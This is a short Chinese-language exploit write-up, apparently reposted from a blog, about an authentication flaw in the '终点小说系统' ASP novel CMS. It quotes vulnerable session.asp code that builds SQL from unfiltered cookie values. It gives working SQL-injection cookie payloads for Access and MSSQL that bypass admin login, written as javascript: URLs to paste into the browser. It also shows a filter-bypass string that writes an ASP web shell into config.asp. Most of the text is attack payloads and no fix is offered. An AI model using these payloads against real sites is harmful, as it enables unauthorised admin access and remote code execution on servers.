终点小说系统用户验证漏洞

来源:http://www.delover.cn/blog/blogview.asp?logID=78
漏洞文件:
session.asp

[Copy to clipboard] [ - ]CODE:
if request.cookies("CnendWeb")("admininfo_loginname")<>"" and request.cookies("CnendWeb")("admininfo_logname")<>"" then
set rs=server.createobject("adodb.recordset")
sql="select * from [admin_user] where username='"&request.cookies("CnendWeb")("admininfo_logname")&"'"

……

if rs("password")<>request.cookies("CnendWeb")("admininfo_logpassword") then

……
得到COOKIE里的用户名带入判断没有过滤.MSSQL的利用方法就很简单了.
说下ACCESS的.

构造admininfo_loginname = jackal' and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin_user where '1'='1

查询出来对应的password就是4

文章可以看下前面的雷驰漏洞.

简单构造下JS,IE地址栏运行,再访问后台就可以了.MSSQL会报错.TEXT和INT的类型错误.自己处理.
ACCESS:

[Copy to clipboard] [ - ]CODE:
javascript:alert(document.cookie="CnendWeb=admininfo%5Flogname=jackal%27+union+select+1%2C2%2C3%2C%274%27%2C5%2C6%2C7%2C8%2C9+from+admin%5Fuser+where+%271%27%3D%271&admininfo%5Flogpassword=4&admininfo%5Fadminclass=1&admininfo%5Floginclass=3&admininfo%5Floginname=1;")
MSSQL:

[Copy to clipboard] [ - ]CODE:
javascript:alert(document.cookie="CnendWeb=admininfo%5Flogname=jackal%27%2B%61%6E%64%2B%31%3D%40%40%76%65%72%73%69%6F%6E%2B%61%6E%64%2B%27%27%3D%27&admininfo%5Flogpassword=4&admininfo%5Fadminclass=1&admininfo%5Floginclass=3&admininfo%5Floginname=1;")
后台写WEBSHELL
逻辑错误的过滤方式:

admin_setup.asp

QUOTE:
WebmasterEmail=Replace(Replace(request.form("WebmasterEmail"),"<"&"%",""),"%"&">","")
过滤掉了"<%"和"%>"
但是我们写入

test"%%>><<%%Execute(Request("a"))%%>>

过滤之后就变成了test"%><%Execute(Request("a"))%>

访问config.asp
成功得到webshell.